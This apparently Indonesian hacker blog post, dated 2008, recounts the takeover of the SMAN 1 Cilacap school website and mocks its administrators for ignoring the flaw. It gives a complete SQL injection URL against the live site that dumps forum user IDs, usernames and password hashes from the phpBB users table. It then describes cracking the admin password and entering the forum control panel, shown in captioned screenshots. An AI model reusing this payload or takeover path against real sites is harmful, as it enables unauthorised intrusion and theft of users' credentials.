Takeover Website SMAN 1 Cilacap


  • SPYRO KiD
  • admin[~@t~]spyrozone[~d.t~]net
  • Wednesday, December 17th, 2008
  • CopyLEFT (c) 2011++ www.spyrozone.net All Rights Reserved


Hmm.. Bug ini sudah sangat-sangat lama terdapat pada situs SMAN 1 Cilacap. Tapi tampaknya pihak Admin cuek-cuek ajah :D Yawdah lah, mungkin pada Adminnya berbaik hati dan memang Ikhlas situsnya digunakan oleh para newbie untuk latihan SQL Injection :D

Hm.. Bulan Oktober kemarin situs ini saya pergunakan sebagai target Demo dalam acara Security Gathering Black-IT & spyroZONE.NET di EEPIS-ITS yang berjudul “WEB HACKING: Common Vulnerability in PHP Web Apps“.

Target kali ini adalah Forum, area paling menggiurkan: banyak data sensitif user yang bisa diambil :D

http://www.sman1clp.com/index.php?cat=artikel&idartikel=-28 union select 1,2,3,group_concat(user_id,0x2d2d,username,0x2d2d,user_password),5 from phpbb_users

Hm.. dan hasilnya adalah.. ^_^

{image: sman1clp.com vulnerable to SQL Injection}

sman1clp.com vulnerable to SQL Injection

Tinggal cari info siapa Adminnya, kemudian crack passwordnya, maka saya sampai di halaman Admin Forum:

{image: sman1clp.com Forum Control Panel}

sman1clp.com Forum Control Panel


//E.O.F